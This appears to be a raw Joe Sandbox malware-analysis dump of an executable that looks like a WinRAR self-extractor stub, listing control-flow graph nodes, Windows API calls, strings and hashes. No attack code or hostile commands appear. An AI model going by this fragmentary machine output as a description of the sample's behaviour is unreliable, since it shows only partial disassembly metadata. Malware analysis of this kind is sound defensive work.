24024->24013 
24048 3887e0 20 API calls _abort 24024->24048 24027->24024 24050 38ac81 LeaveCriticalSection 24028->24050 24030 387db8 24030->24017 24030->24018 24051 38b076 24031->24051 24034 387e1c 24037 387e73 _abort 8 API calls 24034->24037 24035 387dfc GetPEB 24035->24034 24036 387e0c GetCurrentProcess TerminateProcess 24035->24036 24036->24034 24038 387e24 ExitProcess 24037->24038 24039->24009 24041 387e9d GetProcAddress 24040->24041 24042 387ec0 24040->24042 24043 387eb2 24041->24043 24044 387ecf 24042->24044 24045 387ec6 FreeLibrary 24042->24045 24043->24042 24046 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24044->24046 24045->24044 24047 387cf9 24046->24047 24047->24006 24048->24013 24050->24030 24052 38b09b 24051->24052 24053 38b091 24051->24053 24054 38ac98 _abort 5 API calls 24052->24054 24055 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24053->24055 24054->24053 24056 387df8 24055->24056 24056->24034 24056->24035 24057 37e5b1 24058 37e578 24057->24058 24060 37e85d 24058->24060 24086 37e5bb 24060->24086 24062 37e86d 24063 37e8ca 24062->24063 24075 37e8ee 24062->24075 24064 37e7fb DloadReleaseSectionWriteAccess 6 API calls 24063->24064 24065 37e8d5 RaiseException 24064->24065 24066 37eac3 24065->24066 24066->24058 24067 37e966 LoadLibraryExA 24068 37e9c7 24067->24068 24069 37e979 GetLastError 24067->24069 24070 37e9d2 FreeLibrary 24068->24070 24074 37e9d9 24068->24074 24071 37e9a2 24069->24071 24072 37e98c 24069->24072 24070->24074 24076 37e7fb DloadReleaseSectionWriteAccess 6 API calls 24071->24076 24072->24068 24072->24071 24073 37ea37 GetProcAddress 24077 37ea47 GetLastError 24073->24077 24081 37ea95 24073->24081 24074->24073 24074->24081 24075->24067 24075->24068 24075->24074 24075->24081 24078 37e9ad RaiseException 24076->24078 24079 37ea5a 24077->24079 24078->24066 24079->24081 24082 37e7fb DloadReleaseSectionWriteAccess 6 API calls 24079->24082 24095 37e7fb 24081->24095 24083 37ea7b RaiseException 
24082->24083 24084 37e5bb ___delayLoadHelper2@8 6 API calls 24083->24084 24085 37ea92 24084->24085 24085->24081 24087 37e5c7 24086->24087 24088 37e5ed 24086->24088 24103 37e664 24087->24103 24088->24062 24090 37e5cc 24091 37e5e8 24090->24091 24106 37e78d 24090->24106 24111 37e5ee GetModuleHandleW GetProcAddress GetProcAddress 24091->24111 24094 37e836 24094->24062 24096 37e82f 24095->24096 24097 37e80d 24095->24097 24096->24066 24098 37e664 DloadReleaseSectionWriteAccess 3 API calls 24097->24098 24099 37e812 24098->24099 24100 37e82a 24099->24100 24101 37e78d DloadProtectSection 3 API calls 24099->24101 24114 37e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24100->24114 24101->24100 24112 37e5ee GetModuleHandleW GetProcAddress GetProcAddress 24103->24112 24105 37e669 24105->24090 24107 37e7a2 DloadProtectSection 24106->24107 24108 37e7a8 24107->24108 24109 37e7dd VirtualProtect 24107->24109 24113 37e6a3 VirtualQuery GetSystemInfo 24107->24113 24108->24091 24109->24108 24111->24094 24112->24105 24113->24109 24114->24096 25365 37b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25405 371bbd GetCPInfo IsDBCSLeadByte 25367 37eda7 48 API calls _unexpected 25337 37dca1 DialogBoxParamW 25407 37f3a0 27 API calls 25340 38a4a0 71 API calls _free 25341 3908a0 IsProcessorFeaturePresent 25408 366faa 111 API calls 3 library calls 25343 38b49d 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25386 37c793 102 API calls 5 library calls 25370 379580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25371 37b18d 78 API calls 25345 37c793 97 API calls 4 library calls 25347 382cfb 38 API calls 4 library calls 25372 3695f0 80 API calls 25373 37fd4f 9 API calls 2 library calls 25387 365ef0 82 API calls 24283 3898f0 24291 38adaf 24283->24291 24286 389904 24288 38990c 24289 389919 24288->24289 24299 389920 11 API calls 24288->24299 24292 38ac98 _abort 5 API calls 24291->24292 24293 38add6 24292->24293 24294 
38adee TlsAlloc 24293->24294 24295 38addf 24293->24295 24294->24295 24296 37fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24295->24296 24297 3898fa 24296->24297 24297->24286 24298 389869 20 API calls 2 library calls 24297->24298 24298->24288 24299->24286 24300 38abf0 24301 38abfb 24300->24301 24302 38af0a 11 API calls 24301->24302 24303 38ac24 24301->24303 24304 38ac20 24301->24304 24302->24301 24306 38ac50 DeleteCriticalSection 24303->24306 24306->24304 25348 3888f0 7 API calls ___scrt_uninitialize_crt 24321 37eae7 24322 37eaf1 24321->24322 24323 37e85d ___delayLoadHelper2@8 14 API calls 24322->24323 24324 37eafe 24323->24324 25349 37f4e7 29 API calls _abort 24326 37b7e0 24327 37b7ea __EH_prolog 24326->24327 24492 361316 24327->24492 24330 37b841 24331 37bf0f 24557 37d69e 24331->24557 24332 37b82a 24332->24330 24334 37b89b 24332->24334 24335 37b838 24332->24335 24341 37b92e GetDlgItemTextW 24334->24341 24345 37b8b1 24334->24345 24337 37b83c 24335->24337 24338 37b878 24335->24338 24337->24330 24346 36e617 53 API calls 24337->24346 24338->24330 24348 37b95f KiUserCallbackDispatcher 24338->24348 24339 37bf2a SendMessageW 24340 37bf38 24339->24340 24342 37bf52 GetDlgItem SendMessageW 24340->24342 24343 37bf41 SendDlgItemMessageW 24340->24343 24341->24338 24344 37b96b 24341->24344 24575 37a64d GetCurrentDirectoryW 24342->24575 24343->24342 24349 37b980 GetDlgItem 24344->24349 24490 37b974 24344->24490 24350 36e617 53 API calls 24345->24350 24352 37b85b 24346->24352 24348->24330 24354 37b9b7 SetFocus 24349->24354 24355 37b994 SendMessageW SendMessageW 24349->24355 24351 37b8ce SetDlgItemTextW 24350->24351 24356 37b8d9 24351->24356 24597 36124f SHGetMalloc 24352->24597 24353 37bf82 GetDlgItem 24359 37bfa5 SetWindowTextW 24353->24359 24360 37bf9f 24353->24360 24357 37b9c7 24354->24357 24371 37b9e0 24354->24371 24355->24354 24356->24330 24365 37b8e6 GetMessageW 24356->24365 24361 36e617 53 API calls 24357->24361 24576 37abab GetClassNameW 
24359->24576 24360->24359 24366 37b9d1 24361->24366 24362 37b862 24362->24330 24372 37c1fc SetDlgItemTextW 24362->24372 24363 37be55 24367 36e617 53 API calls 24363->24367 24365->24330 24369 37b8fd IsDialogMessageW 24365->24369 24598 37d4d4 24366->24598 24373 37be65 SetDlgItemTextW 24367->24373 24369->24356 24376 37b90c TranslateMessage DispatchMessageW 24369->24376 24378 36e617 53 API calls 24371->24378 24372->24330 24377 37be79 24373->24377 24376->24356 24379 36e617 53 API calls 24377->24379 24381 37ba17 24378->24381 24408 37be9c _wcslen 24379->24408 24380 37bff0 24385 37c020 24380->24385 24388 36e617 53 API calls 24380->24388 24386 364092 _swprintf 51 API calls 24381->24386 24382 37b9d9 24502 36a0b1 24382->24502 24384 37c73f 97 API calls 24384->24380 24389 37c0d8 24385->24389 24395 37c73f 97 API calls 24385->24395 24390 37ba29 24386->24390 24394 37c003 SetDlgItemTextW 24388->24394 24391 37c18b 24389->24391 24431 37c169 24389->24431 24440 36e617 53 API calls 24389->24440 24396 37d4d4 16 API calls 24390->24396 24397 37c194 EnableWindow 24391->24397 24398 37c19d 24391->24398 24392 37ba73 24508 37ac04 SetCurrentDirectoryW 24392->24508 24393 37ba68 GetLastError 24393->24392 24399 36e617 53 API calls 24394->24399 24404 37c03b 24395->24404 24396->24382 24397->24398 24410 37c1ba 24398->24410 24616 3612d3 GetDlgItem EnableWindow 24398->24616 24401 37c017 SetDlgItemTextW 24399->24401 24401->24385 24402 37ba87 24411 37ba9e 24402->24411 24412 37ba90 GetLastError 24402->24412 24403 36e617 53 API calls 24403->24330 24405 37c04d 24404->24405 24438 37c072 24404->24438 24614 379ed5 32 API calls 24405->24614 24406 37c0cb 24415 37c73f 97 API calls 24406->24415 24420 36e617 53 API calls 24408->24420 24441 37beed 24408->24441 24409 37c1e1 24409->24330 24419 36e617 53 API calls 24409->24419 24410->24409 24424 37c1d9 SendMessageW 24410->24424 24416 37bb11 24411->24416 24417 37baae GetTickCount 24411->24417 24418 37bb20 24411->24418 24412->24411 24414 37c1b0 24617 3612d3 GetDlgItem 
EnableWindow 24414->24617 24415->24389 24416->24418 24421 37bd56 24416->24421 24426 364092 _swprintf 51 API calls 24417->24426 24428 37bcfb 24418->24428 24429 37bcf1 24418->24429 24430 37bb39 GetModuleFileNameW 24418->24430 24419->24362 24427 37bed0 24420->24427 24517 3612f1 GetDlgItem ShowWindow 24421->24517 24422 37c066 24422->24438 24424->24409 24433 37bac7 24426->24433 24434 364092 _swprintf 51 API calls 24427->24434 24437 36e617 53 API calls 24428->24437 24429->24338 24429->24428 24608 36f28c 82 API calls 24430->24608 24615 379ed5 32 API calls 24431->24615 24432 37bd66 24518 3612f1 GetDlgItem ShowWindow 24432->24518 24509 36966e 24433->24509 24434->24441 24444 37bd05 24437->24444 24438->24406 24445 37c73f 97 API calls 24438->24445 24440->24389 24441->24403 24442 37bb5f 24447 364092 _swprintf 51 API calls 24442->24447 24443 37c188 24443->24391 24448 364092 _swprintf 51 API calls 24444->24448 24449 37c0a0 24445->24449 24446 37bd70 24450 36e617 53 API calls 24446->24450 24452 37bb81 CreateFileMappingW 24447->24452 24453 37bd23 24448->24453 24449->24406 24454 37c0a9 DialogBoxParamW 24449->24454 24455 37bd7a SetDlgItemTextW 24450->24455 24457 37bbe3 GetCommandLineW 24452->24457 24485 37bc60 __InternalCxxFrameHandler 24452->24485 24465 36e617 53 API calls 24453->24465 24454->24338 24454->24406 24519 3612f1 GetDlgItem ShowWindow 24455->24519 24456 37baed 24459 37baf4 GetLastError 24456->24459 24460 37baff 24456->24460 24461 37bbf4 24457->24461 24459->24460 24463 36959a 80 API calls 24460->24463 24609 37b425 SHGetMalloc 24461->24609 24462 37bd8c SetDlgItemTextW GetDlgItem 24466 37bdc1 24462->24466 24467 37bda9 GetWindowLongW SetWindowLongW 24462->24467 24463->24416 24469 37bd3d 24465->24469 24520 37c73f 24466->24520 24467->24466 24468 37bc10 24610 37b425 SHGetMalloc 24468->24610 24473 37bc1c 24611 37b425 SHGetMalloc 24473->24611 24474 37c73f 97 API calls 24476 37bddd 24474->24476 24545 37da52 24476->24545 24477 37bc28 24612 36f3fa 82 API calls 2 library calls 

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 00370863: GetModuleHandleW.KERNEL32(kernel32), ref: 0037087C
                                                                                          • Part of subcall function 00370863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0037088E
                                                                                          • Part of subcall function 00370863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003708BF
                                                                                          • Part of subcall function 0037A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0037A655
                                                                                          • Part of subcall function 0037AC16: OleInitialize.OLE32(00000000), ref: 0037AC2F
                                                                                          • Part of subcall function 0037AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0037AC66
                                                                                          • Part of subcall function 0037AC16: SHGetMalloc.SHELL32(003A8438), ref: 0037AC70
                                                                                        • GetCommandLineW.KERNEL32 ref: 0037DF5C
                                                                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0037DF83
                                                                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0037DF94
                                                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 0037DFCE
                                                                                          • Part of subcall function 0037DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0037DBF4
                                                                                          • Part of subcall function 0037DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0037DC30
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0037DFD7
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,003BEC90,00000800), ref: 0037DFF2
                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxname,003BEC90), ref: 0037DFFE
                                                                                        • GetLocalTime.KERNEL32(?), ref: 0037E009
                                                                                        • _swprintf.LIBCMT ref: 0037E048
                                                                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0037E05A
                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0037E061
                                                                                        • LoadIconW.USER32(00000000,00000064), ref: 0037E078
                                                                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0037E0C9
                                                                                        • Sleep.KERNEL32(?), ref: 0037E0F7
                                                                                        • DeleteObject.GDI32 ref: 0037E130
                                                                                        • DeleteObject.GDI32(?), ref: 0037E140
                                                                                        • CloseHandle.KERNEL32 ref: 0037E183
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz;
                                                                                        • API String ID: 3049964643-3846469982
                                                                                        • Opcode ID: 799249aa5e2568a8abb7bd7d09d47323709e5da2cc5665c7999cf700022ffeec
                                                                                        • Instruction ID: 64f41ccc6fbc8af45d81688b1888e4b58f0504ab80edae51e2654ccd8e9cfd0b
                                                                                        • Opcode Fuzzy Hash: 799249aa5e2568a8abb7bd7d09d47323709e5da2cc5665c7999cf700022ffeec
                                                                                        • Instruction Fuzzy Hash: A361E771904245AFD333EB75DC4AF6B7BACEF49704F00442AF609962A1DB7C9944CB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0037B73D,00000066), ref: 0037A6D5
                                                                                        • SizeofResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A6EC
                                                                                        • LoadResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A703
                                                                                        • LockResource.KERNEL32(00000000,?,?,?,0037B73D,00000066), ref: 0037A712
                                                                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0037B73D,00000066), ref: 0037A72D
                                                                                        • GlobalLock.KERNEL32(00000000,?,?,?,?,?,0037B73D,00000066), ref: 0037A73E
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0037A7C6
                                                                                          • Part of subcall function 0037A626: GdipAlloc.GDIPLUS(00000010), ref: 0037A62C
                                                                                        • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0037A7A7
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 0037A7CD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                        • String ID: Fjun7$PNG
                                                                                        • API String ID: 541704414-2849507817
                                                                                        • Opcode ID: 1863521c5d82f72862ab62193b2e3dd0c74f06f6a34ef5491a0fc5593ca96d8b
                                                                                        • Instruction ID: 0ae87bb18b19c4718af96f0b6b67185bb12a14f5b5cb6c97da6bb15da91f8f5e
                                                                                        • Opcode Fuzzy Hash: 1863521c5d82f72862ab62193b2e3dd0c74f06f6a34ef5491a0fc5593ca96d8b
                                                                                        • Instruction Fuzzy Hash: E331B5B5500742BFC726AF61DC48D1FBBBCEF84750F054519F90992620EB36DC44CA52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1032 36a69b-36a6bf call 37ec50 1035 36a727-36a730 FindNextFileW 1032->1035 1036 36a6c1-36a6ce FindFirstFileW 1032->1036 1037 36a742-36a7ff call 370602 call 36c310 call 3715da * 3 1035->1037 1039 36a732-36a740 GetLastError 1035->1039 1036->1037 1038 36a6d0-36a6e2 call 36bb03 1036->1038 1045 36a804-36a811 1037->1045 1047 36a6e4-36a6fc FindFirstFileW 1038->1047 1048 36a6fe-36a707 GetLastError 1038->1048 1042 36a719-36a722 1039->1042 1042->1045 1047->1037 1047->1048 1050 36a717 1048->1050 1051 36a709-36a70c 1048->1051 1050->1042 1051->1050 1053 36a70e-36a711 1051->1053 1053->1050 1055 36a713-36a715 1053->1055 1055->1042
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6C4
                                                                                          • Part of subcall function 0036BB03: _wcslen.LIBCMT ref: 0036BB27
                                                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6F2
                                                                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A6FE
                                                                                        • FindNextFileW.KERNEL32(?,?,?,?,?,?,0036A592,000000FF,?,?), ref: 0036A728
                                                                                        • GetLastError.KERNEL32(?,?,?,?,0036A592,000000FF,?,?), ref: 0036A734
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 42610566-0
                                                                                        • Opcode ID: e4dfd870ada6b8613ae315fe5ebdc05a7e372467edbc86006fba10ebd5d46aad
                                                                                        • Instruction ID: 4105d1c71d124da5cfed7a17293c72a5ddd74ea7caa6c97a9b8c8056d6c19af5
                                                                                        • Opcode Fuzzy Hash: e4dfd870ada6b8613ae315fe5ebdc05a7e372467edbc86006fba10ebd5d46aad
                                                                                        • Instruction Fuzzy Hash: CE415276900515ABCB26DF68CC84AEAB7B8FB48350F148296F55EE3240D7346E94CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(?,?,00387DC4,?,0039C300,0000000C,00387F1B,?,00000002,00000000), ref: 00387E0F
                                                                                        • TerminateProcess.KERNEL32(00000000,?,00387DC4,?,0039C300,0000000C,00387F1B,?,00000002,00000000), ref: 00387E16
                                                                                        • ExitProcess.KERNEL32 ref: 00387E28
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$CurrentExitTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 1703294689-0
                                                                                        • Opcode ID: fc99b9f7c487db6621a876b2456ac515fb89d12440e9f4601282ba917814664e
                                                                                        • Instruction ID: c11fc66639e3f387ff8ef6253576152f6d8561cf6c507d664bafeb477e361507
                                                                                        • Opcode Fuzzy Hash: fc99b9f7c487db6621a876b2456ac515fb89d12440e9f4601282ba917814664e
                                                                                        • Instruction Fuzzy Hash: 73E0BF71004244ABCF137F54DD0998A7F6AEB50341F114495F8198A232CB36EE51CB94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: b8ddba661de9c471bfa8a89bbe35a0568777720e6ed7b6759018c223f41d7647
                                                                                        • Instruction ID: 88a6c44eb24b1c1c7872f82ed1df1354f7c8d14a71c94771b41b06c1fcab9899
                                                                                        • Opcode Fuzzy Hash: b8ddba661de9c471bfa8a89bbe35a0568777720e6ed7b6759018c223f41d7647
                                                                                        • Instruction Fuzzy Hash: 6F820C70904145AEDF17DF64C895BFABBB9BF09300F09C2BAD9499F14ADB315A84CB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1621993584.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1621934371.0000000000360000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622027488.0000000000393000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.000000000039E000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003A5000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622048200.00000000003C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1622100311.00000000003C3000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_360000_CJF0Ri1HrG.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: fbe90de6fb6d4d4452b0ce20e6cb9eab6be97ac3fb01568ab6f7219ce8802939
                                                                                        • Instruction ID: c50022afca3cb80faf81fc769043b4e1fa87ac960c36e09b86b8cdfe295d1514
                                                                                        • Opcode Fuzzy Hash: fbe90de6fb6d4d4452b0ce20e6cb9eab6be97ac3fb01568ab6f7219ce8802939
                                                                                        • Instruction Fuzzy Hash: BBD1F4716087408FDB35CF28C85175BBBE0BF89308F09856DE88D9B642D778E909CB56
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 0037B7E5
                                                                                          • Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                          • Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0037B8D1
                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0037B8EF
                                                                                        • IsDialogMessageW.USER32(?,?), ref: 0037B902
                                                                                        • TranslateMessage.USER32(?), ref: 0037B910
                                                                                        • DispatchMessageW.USER32(?), ref: 0037B91A
                                                                                        • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0037B93D
                                                                                        • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0037B960
                                                                                        • GetDlgItem.USER32(?,00000068), ref: 0037B983
                                                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0037B99E
                                                                                        • SendMessageW.USER32(00000000,000000C2,00000000,003935F4), ref: 0037B9B1
                                                                                          • Part of subcall function 0037D453: _wcschr.LIBVCRUNTIME ref: 0037D45C
                                                                                          • Part of subcall function 0037D453: _wcslen.LIBCMT ref: 0037D47D
                                                                                        • SetFocus.USER32(00000000), ref: 0037B9B8
                                                                                        • _swprintf.LIBCMT ref: 0037BA24
                                                                                          • Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5
                                                                                          • Part of subcall function 0037D4D4: GetDlgItem.USER32(00000068,003BFCB8), ref: 0037D4E8
                                                                                          • Part of subcall function 0037D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0037AF07,00000001,?,?,0037B7B9,0039506C,003BFCB8,003BFCB8,00001000,00000000,00000000), ref: 0037D510
                                                                                          • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0037D51B
                                                                                          • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000C2,00000000,003935F4), ref: 0037D529
                                                                                          • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037D53F
                                                                                          • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0037D559
                                                                                          • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037D59D
                                                                                          • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0037D5AB
                                                                                          • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0037D5BA
                                                                                          • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0037D5E1
                                                                                          • Part of subcall function 0037D4D4: SendMessageW.USER32(00000000,000000C2,00000000,003943F4), ref: 0037D5F0
                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0037BA68
                                                                                        • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0037BA90
                                                                                        • GetTickCount.KERNEL32 ref: 0037BAAE
                                                                                        • _swprintf.LIBCMT ref: 0037BAC2
                                                                                        • GetLastError.KERNEL32(?,00000011), ref: 0037BAF4
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0037BB43
                                                                                        • _swprintf.LIBCMT ref: 0037BB7C
                                                                                        • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0037BBD0
